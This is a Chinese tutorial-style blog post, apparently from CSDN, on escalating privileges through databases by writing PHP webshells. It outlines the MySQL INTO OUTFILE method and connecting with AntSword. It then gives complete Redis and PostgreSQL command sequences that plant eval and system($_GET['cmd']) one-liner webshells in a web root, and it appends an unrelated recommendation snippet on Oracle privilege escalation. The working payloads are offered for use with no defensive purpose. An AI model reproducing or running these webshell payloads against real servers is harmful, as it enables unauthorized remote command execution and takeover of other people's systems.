数据库提权--写马

前言

写马提权其实跟UDF提权很像,两者的利用条件差不多,不过写马提权操作步骤比UDF提权要简单一些。

相同点:

1、secure_file_priv 都不能为null

2、都要导入文件到目标服务器中

3、都要知道绝对路径

4、都要root权限

不同点:

1、写马提权知道网站绝对路径是为了后续连接木马,UDF提权知道绝对路径是为了将DLL文件写入到目标服务器

2、两者导入的文件类型不同,写马提权导入的文件是服务器可以解析的木马文件,UDF提权只能是DLL文件

实操 

 1、写入木马

通过into dumpfile或者into outfile 将一句话木马写入到目标服务器。在箭头指向处就是木马的连接地址。

2、验证木马写入成功

3、使用蚁剑连接木马文件

总结

本文只是针对MySQL数据库写马进行了实操训练,redis数据库以及PostgreSQL数据库也可以通过写马进行提权。

redis数据库的webshell代码为:

config set dir /var/www/html/ # 网站根路径

config set dbfilename shell.php

set 1 "<?php @eval($_POST['123']);?>"

save

 

PostgreSQL的webshell代码为:

drop table pwn;

create table pwn (t TEXT);

insert into pwn(t) values ('<?php @system("$_GET[cmd]");?>');

select * from pwn;

copy pwn(t) to '/var/www/html/cmd.php';

drop table pwn;

copy (select '<?php phpinfo();?>') to '/var/www/html/cmd.php'; 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Oracle数据库原理涉及到Oracle数据库限管理和用户限控制机制。 在Oracle数据库中,限是分层次的,包括系统级限和对象级限。系统级限用于控制数据库整体的操作,如创建用户、分配角色等;对象级限用于控制对具体数据库对象(如表、视图、存储过程等)的操作。 当一个用户连接到Oracle数据库时,会使用一个用户名和密码进行认证。用户可以被授予不同的限,这些限可以直接授予给用户,也可以通过角色间接授予给用户。 在过程中,一般可以通过以下几种方式实现: 1. 知道管理员账号:如果获得了管理员账号(如sys账号),就可以直接拥有系统级限,并可以创建或修改其他用户的限。 2. 注入攻击:通过利用数据库应用程序的漏洞,执行恶意代码来。例如,通过SQL注入攻击可以执行未经授的SQL语句,从而获取更高级别的访问限。 3. 通过未修补的漏洞:如果数据库服务器存在已知的未修补漏洞,攻击者可以利用这些漏洞来绕过限限制,获得更高级别的访问限。 4. 工具:一些专门用于的工具可以利用已知的漏洞或弱点,来获取更高级别的访问限。 为了防止数据库攻击,建议采取以下措施: - 保持数据库软件和补丁的最新状态,定期更新数据库软件。 - 遵循最佳安全实践,如使用复杂的密码,定期更改密码,限制远程访问等。 - 对数据库应用程序进行安全审计和代码审查,修复潜在的漏洞。 - 限制用户的限,并按照最小限原则授予用户所需的限。 - 监控数据库活动,及时发现并应对异常行为。 - 配置防火墙和入侵检测系统,及时检测和阻止潜在的攻击。 以上是Oracle数据库的一般原理和建议措施,具体情况可能会因数据库版本、配置和应用程序的不同而有所差异。在实际应用中,请根据具体情况采取相应的安全措施。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值